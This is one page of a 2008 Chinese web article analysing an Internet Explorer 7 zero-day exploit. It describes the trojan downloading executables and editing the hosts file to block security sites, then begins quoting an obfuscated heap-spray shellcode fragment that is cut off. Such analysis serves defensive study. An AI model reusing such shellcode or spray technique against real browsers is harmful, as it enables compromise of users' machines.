攻防实战:深入剖析最新IE7.0 0day漏洞利用代码
2008-12-16 13:42:01 来源:WEB开发网核心提示: (4)木马下载文件在临时文件夹中发现下载了34个可执行文件,如图8所示,攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(5),文件从几K到几十K大小不等,估计应该是针对不同杀毒软件的病毒程序,但也可以改变,通过执行该IE7.0 0Day可以知道黑客或者入侵者利用该工具在系统中所进行
(4)木马下载文件
在临时文件夹中发现下载了34个可执行文件,如图8所示,文件从几K到几十K大小不等,估计应该是针对不同杀毒软件的病毒程序。
图8 下载文件分析
(5)修改host文件,屏蔽国内安全站点
下载文件后,木马然后修改了C:WINDOWSsystem32driversetc下的host文件,如图9所示。
图9 修改host文件
呵呵,说实话,我一开始也没弄明白,这个代码要屏蔽这些网站的目的是什么,后面听一个朋友的话才知道,其中的一些网站是我们国内的一些黑客组织网站;)这难道就是所谓的恶意竞争?
说明:
Hosts文件是一个用于存储计算机网络中节点信息的文件,它可以将主机名映射到相应的IP地址,实现DNS的功能,它可以由计算机的用户进行控制。Windows NT/2000/XP/2003/Vista默认位置%SystemRoot%system32driversetc,但也可以改变。
通过执行该IE7.0 0Day可以知道黑客或者入侵者利用该工具在系统中所进行的操作。
分析和研究该代码
1.分析漏洞代码
代码应该说还是比较简单的,关键的Shellcode应该就是这一大段乱码了
spray
(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dad
更多精彩
赞助商链接